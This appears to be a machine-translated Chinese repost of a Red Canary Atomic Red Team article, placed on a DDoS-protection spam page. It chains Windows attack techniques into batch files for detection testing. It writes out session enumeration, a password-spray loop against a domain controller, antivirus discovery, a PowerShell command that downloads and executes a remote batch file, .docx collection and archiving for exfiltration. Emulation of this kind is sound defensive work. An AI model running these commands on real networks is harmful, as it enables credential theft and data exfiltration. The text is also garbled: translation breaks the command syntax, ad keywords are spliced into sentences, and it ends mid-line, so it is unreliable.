来自 DDOS 2021-02-20 11:00 的文章

服务器加防护_香港_服务器流量攻击怎么防御

服务器加防护_香港_服务器流量攻击怎么防御

原子红团队的本质是允许定制不同的测试单元,以确定环境中的覆盖、预防或检测。连锁反应是我们开发的一个概念,使安全团队能够组合多个MITRE ATT&CK™ 技术并同时执行它们。您可以使用这些自由形式的方法来构建事件序列或生成事件数据。为了简单起见,我们决定标准化使用PowerShell和Bat文件;随着时间的推移,高防cdn代理,随着atomicredteam的成熟,这一点很容易改变。本文将详细介绍如何通过使用多种ATT&CK策略和技术来构建连锁反应,然后说明如何确定您已准备好的解决方案是否阻止和/或检测到这些行为。无论连锁反应是否遵循正确的TTP,生成模拟是确定检测和ATT&CK覆盖范围之间的差距的关键。观看按需培训课程,与Red Canary的应用研究团队一起构建连锁反应。产生连锁反应产生连锁反应没有科学的艺术。想法可以来自任何地方,海外游戏ddos防御,比如浏览Windows技术矩阵或者阅读最近的威胁简报。英特尔简报提供的一个很好的连锁反应例子在《捉龙捉尾》一书中概述。本文解释了如何利用对特定参与者的观察,并以在您的环境中生成类似事件数据的方式生成测试。这类研究可采用一个简单的循环:最终目标是确认覆盖率或创建新的覆盖率。此外,它还允许防御者以探测潜在噪音的发现技术,或识别低度和缓慢行为的方式获得创造性。选择你的技术这种连锁反应的测试基于渗透测试中常见的行为。连锁反应可以是嘈杂的,也可以是安静的,这取决于用例。我们有意识地组织好防范和检测噪音的设施。对于每个测试,我们将执行以下操作:每种技术的分解如何选择它并将其构建为批处理文件的链式反应格式从炭黑反应遥测来识别这些战术和技术别再费事了…让测试开始吧!测试1战术:发现技术:系统所有者/用户发现在这个场景中,我们将构建一个活动,该活动涉及参与者通过执行凭证转储或使用另一种技术查询登录会话的端点来检索有效帐户。为了测试的目的,我们将选择最吵的实例。我们将使用qwinsta.exe在Windows上:查询单个或多个端点输出用户名列表尝试执行密码喷洒让我们把它分解…WINSA.exe文件用于查询工作站并接收任何远程终结点上的有效会话列表。库瑟.exe非常相似。您可以构建它来查询一个或多个端点。下面是每个例子…单端点:对于/F"tokens=1,2"%i in('qwinsta/server:^ | findstr"Active Disc"')do@echo%i | find/v"#"|查找/v"console"| | echo%j>用户名.txt多个端点:将计算机名列表放入计算机.txt您有权查询:@对于/F%n英寸(计算机.txt)DO@FOR/F"tokens=1,2"%i in('qwinsta/server:%n^ | findstr"Active Disc"')DO@echo%i |查找/v"|"|查找/v"console"| | echo%j>用户名.txt现在我们已经从环境中的端点获得了列表,我们可以执行密码喷射以生成大量的身份验证噪音。炭黑的外观:测试2策略:凭证访问,横向移动技术:暴力,Windows管理员共享在这个测试中,我们将使用我们发现的凭据和密码列表来尝试访问内部系统。@对于/F%n英寸(用户名.txt)执行@FOR/F%p in(密码.txt)DO@net use\\COMPANYDC1\IPC$/用户:公司\%n%p 1>NUL 2>&1&&@echo[*]%n:%p&&@net use/delete\\COMPANYDC1\IPC$>NUL对于密码.txt文件,使用一些标准项目,如:2017年冬季2018年冬季2018年秋季我们可以按原样运行脚本,也可以添加一个真正的域控制器(replace COMPANYDC1)并尝试多次身份验证失败。我们稍后再讨论。注意不要锁定生产帐户。运行这两个脚本将产生大量的噪声,这给了我们一个检查检测覆盖率的机会。炭黑的外观:测试3战术:发现,执行技术:安全软件发现,批量有效负载发现号最终可能成为你最嘈杂的盟友,或者你对系统信息的低而慢的枚举。在我们的示例中,我们将从在端点上查找任何AV解决方案开始,然后通过PowerShell执行执行附加的批处理文件。安全软件发现应该足够简单。我们将使用netsh.exe文件在防火墙中查询配置文件中的任何感兴趣的项。另外,我们要跑任务列表.exe识别特定产品。netsh advfirewall firewall show rule name=全部任务列表.exe|findstr cb公司任务列表.exe|findstr病毒任务列表.exe|findstr防守者对于发现.bat文件,我们通过使用PowerShell下载批处理文件并运行它来生成额外的噪声。在这种情况下,百度云ddos防御,很容易做到:powershell.exe"IEX(新对象Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"这将下载发现.bat从原子红队的有效载荷目录执行它。这两个因素的结合将使任何人都忙于确认检测能力。在一个端点上会产生很多噪音,但是不要忘记下载会通过防火墙或IDS/IPS。炭黑的外观:测试4战术:收集技术:自动收集在这个连锁反应中,我们希望将一堆特定的文件类型复制到另一个目录中。在本例中,我们选择了.docx文件。也许有一个会是这样密码.docx文件?其他包括专有文件和内幕信息。总之,这是一个很好的用例,可以用来识别我们环境中可疑的信息收集。对于/R c:%f(在(*.docx)中,请复制%f c:\temp\炭黑的外观:从命令提示符上的批处理文件运行,高防cdn和高防服务器对比,Carbon Black在这里收集的信息不多。但是,我们确实看到文件被移动到c:\temp目录。这本身并不是恶意的,但是如果它有几千个filemod,这就变得有趣了。但是,ddos防御AWS,请注意,许多进程执行几百到数千个filemod作为正常活动。尽量把范围缩小到特定的过程。filemod_计数:[1到1000](进程_名称:cmd.exe或过程_名称:powershell.exe)测试5战术:渗出技术:数据压缩既然我们已经从单个端点收集了所有的docx数据,我们需要对其进行压缩并对其进行预处理以进行过滤。命令行.exe/cpowershell.exe压缩存档-路径C:\temp\*-压缩级别最佳-目标路径C:\temp\所有数据.zip很简单,对吧?如果您想尝试另一条路线,我们也为这条线路提供了备用终点:rar a-r公司exfilthis.rar公司*.docx文件它将需要winrar,目前大多数端点都在运行。炭黑的外观:引爆最后的连锁反应有了这些,我们就有了最后一个简单的"点击运行"连锁反应,在一个地方执行所有这些技术。.要点{宽度:100%!重要信息;}
.gist文件
.gist数据{最大高度:250px;最大宽度:100%;}
●链式反应器::::●战术:发现●技术:系统所有者/用户发现:https://attack.mitre.org/wiki/technology/T1033●单端点:对于/F"tokens=1,2"%%i in('qwinsta/server:^ | findstr"Active Disc"')do@echo%%i |查找/v"|查找/v"控制台"| echo%%j>用户名.txt●多个端点@对于/F%%n英寸(计算机.txt)DO@FOR/F"tokens=1,2"%%i in('qwinsta/server:%%n^ | findstr"Active Disc"')DO@echo%%i |查找/v"|查找/v"控制台"| echo%%j>用户名.txt●战术:凭证准入、横向移动●手法:蛮力:https://attack.mitre.org/wiki/technology/T1110·技巧:Windows管理员共享:https://attack.mitre.org/wiki/technology/T1077@对于/F%%n英寸(用户名.txt)执行@FOR/F%%p(密码.txt)DO@net use\\COMPANYDC1\IPC$/用户:公司\%%n%%p1>NUL 2>&1&&@echo[*]%%n:%%p&&@net use/delete\\COMPANYDC1\IPC$>NUL●战术:发现●技术:安全软件发现:https://attack.mitre.org/wiki/technology/T1063netsh advfirewall firewall show rule name=全部任务列表.exe|findstr cb公司任务列表.exe|findstr病毒任务列表.exe|findstr防守者●战术:执行、发现●技巧:PowerShell:https://attack.mitre.org/wiki/technology/T1086●手法:穆特